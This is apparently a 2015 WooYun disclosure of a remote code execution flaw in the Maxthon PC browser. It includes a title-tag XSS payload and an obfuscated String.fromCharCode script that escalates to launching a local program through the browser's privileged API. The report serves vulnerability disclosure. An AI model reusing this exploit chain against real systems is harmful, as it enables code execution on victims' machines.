当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093544

漏洞标题:傲游浏览器pc端远程代码执行

相关厂商:傲游

漏洞作者: 梧桐雨

提交时间:2015-01-23 16:14

修复时间:2015-04-23 16:16

公开时间:2015-04-23 16:16

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-23: 细节已通知厂商并且等待厂商处理中
2015-01-23: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向第三方安全合作伙伴开放
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

Remote command execution

详细说明:

傲游浏览器在设计的时候对关键的地方没有做过滤处理,导致res域下存在特权域的xss。结合前面研究过的案例是可以导致命令执行的。
1、傲游浏览器在对访问过的网页title没有做处理,就带入到了网页当中:
构造一个html如下:
<title><script>alert(document.domain)</script></title>
先访问一次,然后在打开新窗口的地方:

44.jpg


随意打开一个新窗口:

55.jpg


弹出了document.domain 是res,似乎我们可以做点什么。嗯
结合二哥之前发布的
WooYun: 傲游浏览器远程命令执行漏洞二
以及
Lyleaks发布的:
WooYun: 傲游浏览器远程命令执行漏洞(Web端+客户端配合利用技巧)
我们不难构造代码,
但是在构造代码的过程中,居然发现<script></script>这样不能直接执行,经过了无数次尝试,各种姿势都试过了,才发现通过引用外域<script src="1.js"></script>可以达到调用任意exe的目的。

漏洞证明:

本地构造:
mxrtc.js:

eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,115,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,115,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,115,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,67,58,47,119,105,110,100,111,119,115,47,115,121,115,116,101,109,51,50,47,99,97,108,99,46,101,120,101,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))


先访问一次,然后再打开一个新窗口:

66.jpg


123.jpg


哦,对了,是最新版:

321.jpg


执行远程的命令,仅需要对external.mxCall对象做调用即可。前面例子很多了,不多说。。
演示链接: http://pan.baidu.com/s/1kTBViT5 密码: ufks

修复方案:

对mx://res/quick-access/index.htm输出检查。过滤。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-23 17:20

厂商回复:

新标签页安全漏洞

最新状态:

暂无